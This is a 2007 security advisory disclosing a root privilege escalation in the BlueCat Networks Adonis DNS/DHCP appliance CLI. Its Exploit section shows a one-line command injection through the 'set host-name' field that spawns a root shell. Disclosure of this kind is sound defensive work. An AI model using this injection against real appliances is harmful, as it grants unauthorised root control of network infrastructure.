Template Security Security Advisory ----------------------------------- BlueCat Networks Adonis CLI root privilege escalation Date: 2007-08-16 Advisory ID: TS-2007-003-0 Vendor: BlueCat Networks, http://www.bluecatnetworks.com/ Revision: 0 Contents -------- Summary Software Version Details Impact Exploit Workarounds Obtaining Patched Software Credits Revision History Summary ------- Template Security has discovered a root privilege escalation vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance which allows the admin user to gain root privilege from the Command Line Interface (CLI). Software Version ---------------- Adonis version 5.0.2.8 was tested. Details ------- The admin account on the Adonis DNS/DHCP appliance provides access to a CLI that allows an administrator to perform tasks such as setting the IP address, netmask, system time and system hostname. By entering a certain command sequence, the administrator is able to execute a command as root. Impact ------ Access to the admin account is the same as root access on the appliance. Exploit ------- Here we use the 'set host-name' CLI command to execute a root shell: :adonis>set host-name ;bash adonis.katter.org root@adonis:~# id uid=0(root) gid=0(root) groups=0(root) NOTE: There may be other command sequences that accomplish the same result. Workarounds ----------- Only provide admin account access to administrators that also have root account access on the appliance. Obtaining Patched Software -------------------------- Contact the vendor. Credits ------- forloop discovered this vulnerability while enjoying a Tuborg Gold. forloop is a member of Template Security. Revision History ---------------- 2007-08-16: Revision 0 released